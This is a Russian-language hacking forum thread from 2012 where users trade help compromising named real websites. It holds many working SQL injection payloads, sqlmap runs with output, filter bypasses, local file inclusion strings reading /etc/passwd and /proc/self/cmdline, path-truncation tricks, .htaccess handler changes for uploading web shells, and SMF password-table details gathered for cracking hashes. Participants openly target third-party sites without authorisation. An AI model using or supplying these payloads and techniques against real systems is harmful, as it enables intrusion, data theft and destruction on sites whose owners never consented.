Просмотр полной версии : Ваши вопросы по уязвимостям.
mix0x0,
у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
stan0009
13.03.2012, 20:50
в какой таблице находится логин и пароль от форума SMF?
а то найти не могу(
все, было найдено. Просто в 200 таблицах потерялся)
кто не знает - это smf_members
xcedz said:
awk, grep
Спасибо за наводку, будем гуглить.
Ereee said:
mix0x0
,
у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
Ereee, шелла нету, только дамп бд.
Нужно спарсить логины, хэши (+salt) для брута, в дальнейшем использовать как словарь.
xcedz said:
Во первых есть поиск в мускуль базу
Во вторых смф имеет открытые исходники
В третьих
SMF (SMF 1.1.x.): sha1($$username.$$pass)
/Sources/Admin.php
smf_members
id_member
id_group
member_name
passwd
password_salt
email_address
ICQ
AIM
member_ip
member_ip2
secret_question
secret_answer
http://dbitems.wen.ru/
В четвертыx новый адрес сайта http://dbitems.ru
Помогите скулю разкрутитть плыз
тут
http://zapoved.ru/?act=docs_more&id=3
тут
http://nir.msu.mogilev.by/?mod=resource&id=31
и тут
http://www.mgpu.ru/download.php?id=11048
Cybersteger
13.03.2012, 23:01
faza02 said:
Faaax
=\
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit
+
1,1)
так видно?
исходя из данных каторих ты дал, можно перебирать с помощью WHERE если есть по чему перебирать типа колонка (id) или попробовать вариант с акумуляцею данных в переменную
Code:
union(select(1),2,3,(select(@x)from(select(@x:=0x0 0),(select(null)from(information_schema.columns)wh ere(table_schema!=0x696e666f726d6174696f6e5f736368 656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_ schema,0x2e,table_name,0x3a,column_name))))x),5,(6 ))
https://rdot.org/forum/showthread.php?t=1170 -- для изучения
xcedz said:
1
sqlmap.py -u "http://zapoved.ru/?act=docs_more&id=3" -p "id" --random-agent --technique=EU --dbms=mysql -v 3
Code:
Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: act=docs_more&id=3') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7174643a,0x4b686a6b476d6f6d504f,0x3a717 2763a)# AND ('DzDB'='DzDB Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, [QUERY]#
2
Code:
Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: mod=resource&id=31 AND (SELECT 4325 FROM(SELECT COUNT(*),CONCAT(0x3a7361633a,(SELECT (CASE WHEN (4325=4325) THEN 1 ELSE 0 END)),0x3a6f62653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ---
3
субд Firebird хз над поковырять
а чего не получается ничего вывести?
http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1,table_name,3,4 ,5,6,7+from+information_schema.tables+limit+0,1+an d+%28%27DzDB%27=%27DzDB
вопрос мой исчерпан, спасибо Cybersteger, так же к прочтению всплыло https://rdot.org/forum/showthread.php?t=1243
HeaVeNSeR
13.03.2012, 23:34
Ребят,помогите продвинуться в раскрутке скули
http://www.single-russian-woman.com...0&show=0&sorting=-1bvn5&weight1=1&weight2=210 (http://www.single-russian-woman.com/cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210)
уязвимость в параметре sorting,вроде...ошибка в HTTP-заголовке
Code:
http://www.single-russian-woman.com/cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210
GET /cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210 HTTP/1.1
Host: www.single-russian-woman.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: adv=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26r ct%3Dj%26q%3Dsingle%2520russian%2520women%26source %3Dweb%26cd%3D1%26ved%3D0CHUQFjAA%26url%3Dhttp%253 A%252F%252Fwww.single-russian-woman.com%252F%26ei%3DZlFeT4PlJc_V4QSqkL3iDw%26usg %3DAFQjCNEj3xkfJiBZvycDvWk08byKTKFdZg; seeking=0; country=; age1=19; age2=100; height1=100; height2=250; weight1=1; weight2=210; sorting=15; lang=; langlevel=; eyecolor=; haircolor=; activerest=; genrefilms=; favmusic=; zodiac=; smoking=; drinking=; children=; keyword=; name=; maritalstatus=; russian=; photost=0; session=n2aojhfg57vb0xpim5kpgc1147925
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Tue, 13 Mar 2012 19:20:30 GMT
Server: Apache/2.2.3 (CentOS)
DBD: :mysql::st execute failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 0, 12' at line 1 at search.cgi line 1285., :mysql::st fetchrow failed: fetch() without execute() at search.cgi line 1286.
Set-Cookie: seeking=0; path=/
Set-Cookie: country=; path=/
Set-Cookie: age1=19; path=/
Set-Cookie: age2=100; path=/
Set-Cookie: height1=100; path=/
Set-Cookie: height2=250; path=/
Set-Cookie: weight1=1; path=/
Set-Cookie: weight2=210; path=/
Set-Cookie: sorting=15; path=/
Set-Cookie: lang=; path=/
Set-Cookie: langlevel=; path=/
Set-Cookie: eyecolor=; path=/
Set-Cookie: haircolor=; path=/
Set-Cookie: activerest=; path=/
Set-Cookie: genrefilms=; path=/
Set-Cookie: favmusic=; path=/
Set-Cookie: zodiac=; path=/
Set-Cookie: smoking=; path=/
Set-Cookie: drinking=; path=/
Set-Cookie: children=; path=/
Set-Cookie: keyword=; path=/
Set-Cookie: name=; path=/
Set-Cookie: maritalstatus=; path=/
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
----------------------------------------------------------
также на соседском сайте джумла стоит...на нем из паблик exploitov один ток подошёл вроде..( http://seclists.org/bugtraq/2011/Apr/80 )
тоже вроде скуля,но продвинуться мне там не получилось...
http://www.stopsmoking4steps.com/index.php?option=com_jce&Itemid=-1
подсобите,пожалуйста,в какую сторону копать
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Fooog said:
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html
foma9999
14.03.2012, 02:30
http://wmrace.ru/buy.php?carid=-3'+union+select+1,2,3,4,5,6,7,8,9,10,11--+
Помогите раскрутить, пока что смог - это узнать версию:
Code:
http://wmrace.ru/buy.php?carid=-3'%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201% 20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROU P%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR (RAND(0)*2)))--+
да, прямого вывода на стр. нету
upd:
antichat:antichat
http://wmrace.ru/buy.php?carid=3'+or+1+group+by+concat(version(),fl oor(rand(0)*2))+having+min(0)+or+1--+
как error-based крути.
upd:
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
foma9999
14.03.2012, 05:33
faza02 said:
http://wmrace.ru/buy.php?carid=3'+or+1+group+by+concat(version(),fl oor(rand(0)*2))+having+min(0)+or+1--+
как error-based крути.
upd:
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
Спасибо, жаль, не успел посмотреть, прикрыли, оперативно.
А что выводил этот запрос?
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
все таблицы из information_schema.tables выводил.
На сайт 8 марта была произведена атака с целью стереть все данные о балансе аккаунтов и выплат.
ты не первый)
xcedz said:
Всё там норм
та не норм, пишет же ошибку
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and ('DzDB'='DzDB')' at line 1
что я там неправильно подставил?
http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1,table_name,3,4 ,5,6,7+from+information_schema,tables+and+%28%27Dz DB%27=%27DzDB
HAXTA4OK
14.03.2012, 12:29
http://zapoved.ru/?act=docs_more&id=-3%27%29+UNION+SELECT+1,table_name,3,4,5,6,7+from+i nformation_schema.tables%23
что не так? =\
Реебят, а можете мне обьямнить какой толк от такой уязвимости как include(LFI)? ну допустим я смогу просмотреть файл etc/passwd а толк от него?, увижу пути и логины узеров без паролей и всё, может я чегото ещо не знаю, дайте линки почитаю
/threadnav12123-1-10.html
/thread23501.html
/thread91807.html
/thread98525.html
faza02 said:
/threadnav12123-1-10.html
/thread23501.html
/thread91807.html
/thread98525.html
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
HAXTA4OK
14.03.2012, 15:57
qaz said:
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
/thread49775.html
вот тут поищи, там где то в теме был вроде скрипт
shell_c0de
14.03.2012, 16:01
qaz said:
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
http://wonted.ru/programms/librute/
https://rdot.org/forum/showthread.php?t=1142
shell_c0de said:
http://wonted.ru/programms/librute/
ухты, спасиб, но прога немного фуфловатся, ечто что именно касается словаря,
ведь допустим путь может быть разный, не только
../../../../etc/passwd а и юольше ../../../../../../etc/passwd и меньше,
мне как надо срегеть пути рзный длины и все записывать, получается? или я чегото непонимаю?
kise said:
А там вроде идет такой инклуд - http://zamok-met.ru/catalog/somefile? Или я не в теме
?
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd%00
Подскажите как использовать эту инъекцию...
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
Expl0ited
14.03.2012, 17:19
kise said:
Подскажите как использовать эту инъекцию...
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
http://en.wikipedia.org/wiki/List_of_HTTP_headers
Изучай
Expl0ited
14.03.2012, 17:28
qaz said:
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
Выполнение PHP кода:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
Вернет:
/bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64 HTTP/1.0
Запрос отправлять не через браузер, иначе все символы урлкодируются.
qaz said:
или может есть более умный способ для их поиска? подскажите
Руки и голова
jecka3000
14.03.2012, 18:52
На админку стоит дополнительная авторизация .htaccess. Как-нить можно попасть в админ панель?
П.С. Все логин, пасс админа есть
Спасибо за ответ, не могли бы ли вы подсказать какой-нибудь удобный инструмент для эксплуатации уязвимости?
justonline
14.03.2012, 19:02
kise said:
Да, я раньше пользовался этими способами. Но мне нужен инструмент где можно отправлять свои куки, хедеры и т.п. Например некоторые запросы нельзя отправить браузером.
charles/tamper data в них хоть оргазм имитируй)
shell_c0de
14.03.2012, 19:02
Плагины мозиллы
HttpREQ
Inetcrack
самописные скрипты
jecka3000
14.03.2012, 19:20
еще вопрос.
Надо залить шелл. В админке могу только редактировать новости, а в новостях добавлять картинки. При добавлении картинки все хорошо заливается, даже расширение .пхп. Заливается на сервер. НО когда я заливаю например wso.php и потом иду по ссылки картинки получаю The server encountered an internal error or misconfiguration and was unable to complete your request.
когда же заливаю шелл с расширением например .jpg то нормально переходит по ссылке, но шел не срабатывает.
Есть какие то еще варианты?
Pirotexnik
14.03.2012, 19:27
kise said:
Есть ли что-то более удобное или функциональное?
Уйма. Можешь юзать морковку, панголини, safe3, круизер в конце концов.
Но лично я пришел к выводу, что лучше рук ничего ещё не написали)
Pirotexnik
14.03.2012, 19:29
jecka3000 said:
еще вопрос.
Надо залить шелл. В админке могу только редактировать новости, а в новостях добавлять картинки. При добавлении картинки все хорошо заливается, даже расширение .пхп. Заливается на сервер. НО когда я заливаю например wso.php и потом иду по ссылки картинки получаю The server encountered an internal error or misconfiguration and was unable to complete your request.
когда же заливаю шелл с расширением например .jpg то нормально переходит по ссылке, но шел не срабатывает.
Есть какие то еще варианты?
Залить .htaccses как вариант. Потм залить какой-то shell.ololovskiy и открыть как исполняемый.
jecka3000
14.03.2012, 19:36
Pirotexnik said:
Залить .htaccses как вариант. Потм залить какой-то shell.ololovskiy и открыть как исполняемый.
ты имеешь в виду разрешить выполнение php файлов как картинку?
типа
Code:
AddType application/x-httpd-jpg .php
попробуй залить phpinfo(); и скажи что выйдет
если нет, то да, попробуй AddType application/x-httpd-jpg .ololo
и лей шелл.ololo
jecka3000
14.03.2012, 21:14
faza02 said:
попробуй залить phpinfo(); и скажи что выйдет
если нет, то да, попробуй AddType application/x-httpd-jpg .ololo
и лей шелл.ololo
С пхп инфо не прокатило.
во втором случае просто выводит исходный код шелла, но не исполняет его
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+
помогите обойти фильтр
jecka, php_flag engine 1
AddHandler application/x-httpd-php .ololo
jecka3000
14.03.2012, 21:39
faza02 said:
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+
помогите обойти фильтр
jecka, php_flag engine 1
AddHandler application/x-httpd-php .ololo
самое смешное, что и .htaccess как txt обрабатывается, т.е. при переходе на "картинку" вылетает содержимое htaccess..странно
faza02 said:
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+
помогите обойти фильтр
jecka, php_flag engine 1
AddHandler application/x-httpd-php .ololo
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,table_name,3,4,5,6,78,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28+from+information _schema.`tables`+limit+1,1--+
и т.д.
%20 ток убери)
OxoTnik said:
Fooog said:
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html
" if author else f"
OxoTnik said:
Fooog said:
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html
Так точно. Но при:
1'+order+by+1+--
Выдает:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1
А при:
1'/**/order/**/by/**/1/**/--
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1
+GROUP+BY+1+--
Также не помогает.
aydin-ka
14.03.2012, 22:33
Fooog said:
Так точно. Но при:
1'+order+by+1+--
Выдает:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1
А при:
1'/**/order/**/by/**/1/**/--
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1
+GROUP+BY+1+--
Также не помогает.
Фильтруется кавычка. Попробуй ?id=9999999999+order+by+1+--
Га-Ноцри
14.03.2012, 22:41
Всем добрый вечер. Суть такова - через админку заливаю шелл. Расширение .php без проблем пропускается, но при обращению к этому скрипту вылетает 500 ошибка. Далее пытался залить в эту же директорию .htaccess, чтобы попробовать порулить Апачем в пределах этой директории, но беда в том, что скрипт дописывает к началу любого загружаемого файла определенные символы, и получается что-то типа x_1.htaccess.
Что можно придумать?
aydin-ka said:
Фильтруется кавычка. Попробуй ?id=9999999999+order+by+1+--
тоже нет.
not found!
Так же указано. Бага формата не ?id=1, a id/1'
При запросе ?id=1 страница та, но ошибка отсутствует.
aydin-ka
14.03.2012, 22:53
Fooog said:
тоже нет.
not found!
Так же указано. Бага формата не ?id=1, a id/1'
При запросе ?id=1 страница та, но ошибка отсутствует.
Попробуй так id/1?id=1'
P.S: лучшее ссылку в ПМ...
aydin-ka said:
Попробуй так id/1?id=1'
P.S: лучшее ссылку в ПМ...
Ошибку не выводит. Отправил в ПМ...
народ а тут, нужно отсеять окончание, нул байт не помогает
http://proeveryday.ru/index.php?id=../etc/passwd%00
тут читал /thread98525.html но нифига неполучилось, мб недопонял
подскажите как правильно
попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
site.com/page.php=about.php выдаёт about.php на сервере
site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте
Можно как-то залить шелл на site.com?
скинь ссылку в ЛС,тут же нет экстрасенсов
HAXTA4OK
15.03.2012, 02:43
Spunoff said:
site.com/page.php=about.php выдаёт about.php на сервере
site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте
Можно как-то залить шелл на site.com?
скорее всего это просто ифрейм а не инклуд
Теперь я знаю какой код на странице
т.е это получается инклуд всё-таки...но почему он при
site.com/page.php=http://shell.com/shell.php показывает шелл, но на моём же хосте?
Подскажите плиз как залить шелл сюда?
register_globals=Off
mironich
15.03.2012, 04:31
показывает шелл, но на моём же хосте?
Скорее всего потомучто выполняеться на твоем хосте?
Переименуй из php в txt и проверь.
mironich спасибо, помогло
Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.
Есть ли возможность получить доступ к бд или залить шелл?
Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.
Есть ли вообще известные уязвимости под эту версию?
JorryGo said:
Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.
Есть ли возможность получить доступ к бд или залить шелл?
Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.
Есть ли вообще известные уязвимости под эту версию?
https://rdot.org/forum/showpost.php?p=13736&postcount=6
при mq=off и PHP
Faaax said:
попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
qaz said:
а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
/thread98525.html
Melfis said:
/thread98525.html
блин я же написал
народ а тут, нужно отсеять окончание, нул байт не помогает
http://proeveryday.ru/index.php?id=../etc/passwd%00
тут читал /thread98525.html но нифига неполучилось, мб недопонял
подскажите как правильно
подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать?
ввел например туда '1 и он ошибку вывел
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
Expl0ited
15.03.2012, 13:43
CheatXX said:
подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать?
ввел например туда '1 и он ошибку вывел
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
Вывести данные из базы, в ошибке, вбив в не фильтруемое поле:
' and (select 1 from(select count(*), concat(version(), 0x00, floor(rand(0)*2))x РЕАЛЬНАЯ_ТАБЛИЦА group by x)a) or '
там ограничение 40 символов к сожалению
там два поля идет уязвимых,
там идет первое поле 40 символов, второе поле 40 символов, '0', 0); т.е так скорей всего
'тут первое поле','тут второе','0',0);
в скрипте ограничение
Expl0ited
15.03.2012, 13:55
CheatXX said:
там ограничение 40 символов к сожалению
ограничение где именно? в форме, или в обрабатываемом скрипте?
если первое, то легко обходится, посылкой собственного запроса
второе к сожалению не обойти
CheatXX said:
там ограничение 40 символов к сожалению
Попробуй, используя оперу изменить исходный код поля, тем самым убрать ограничение на кол-во символов.
Попробуй разделить запрос как-то =)
mix0x0 said:
Попробуй, используя оперу изменить исходный код поля, тем самым убрать ограничение на кол-во символов.
в самом скрипте ограничение
ReV0LVeR
15.03.2012, 14:02
запрос выглядит как:
site.ru/generat1.php?src=sitefotos/sitefotos_13153512082010.jpg
при подмене на
site.ru/generat1.php?src=site.ru/1.gif выводит картинку.. скрипты и т д не исполняет... что делать?
CheatXX, попробуй так разделить запросы например
' and (select 1 from(select /*
*/count(*), concat(version(), 0x00,/*
*/ floor(rand(0)*2))x /*
*/РЕАЛЬНАЯ_ТАБЛИЦА /*
*/group by x)a) or '
ReV0LVeR,
ничего кроме раскрытия пути ты не получишь думаю.
Ereee said:
CheatXX, попробуй так разделить запросы например
там 140 символов получается, а два поля дают только 80) может кто то сайт посмотреть ? ссылку в лс скину
еше 1 поле есть, ограничения нет но выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near'accounts group by x)a) or '',0)' at line 1
LFI
Expl0ited said:
Выполнение PHP кода:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
Вернет:
/bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&
Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64
HTTP/1.0
Запрос отправлять не через браузер, иначе все символы урлкодируются.
Руки и голова
А при каких условиях пхп кода и настроек апача удаеться провести такой финт с выполнением пхп кода:
Code:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
Cennarios
16.03.2012, 19:18
Zahar said:
А при каких условиях пхп кода и настроек апача удаеться провести такой финт с выполнением пхп кода:
Code:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
В первую очередь у пользователя под которым работает веб-сервер непосредственно обрабатывающий PHP скрипты должны быть права на виртуальную файловую ситстему /proc. Во вторых в скрипте в функции инклуда не должно быть препенда вида /xxx.$etc Далее как было указано многоуважаемым Expl0ited не через браузер ибо url-encoded строка делается. Так-же , в скрипте может оказывать влияние какая-либо фильтрация или рекодировка и прочие финты программиста. Естественно magic_quotes Off.
а через что тогда?
просто через burp site пробовал не получилось,в нём знак & и после него остальное определяет как новую переменную
Expl0ited поделись пожалуйста через что ты сделал?
Думаю curl "запрос" вполне удобная штуковина.
через curl такаяже ситуация.
как ещё можно?
народ а тут, нужно отсеять окончание, нул байт не помогает
http://proeveryday.ru/index.php?id=../etc/passwd%00
тут читал /thread98525.html но нифига неполучилось, мб недопонял
подскажите как правильно
запрос такой
Code:
curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline&/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
Code:
curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././.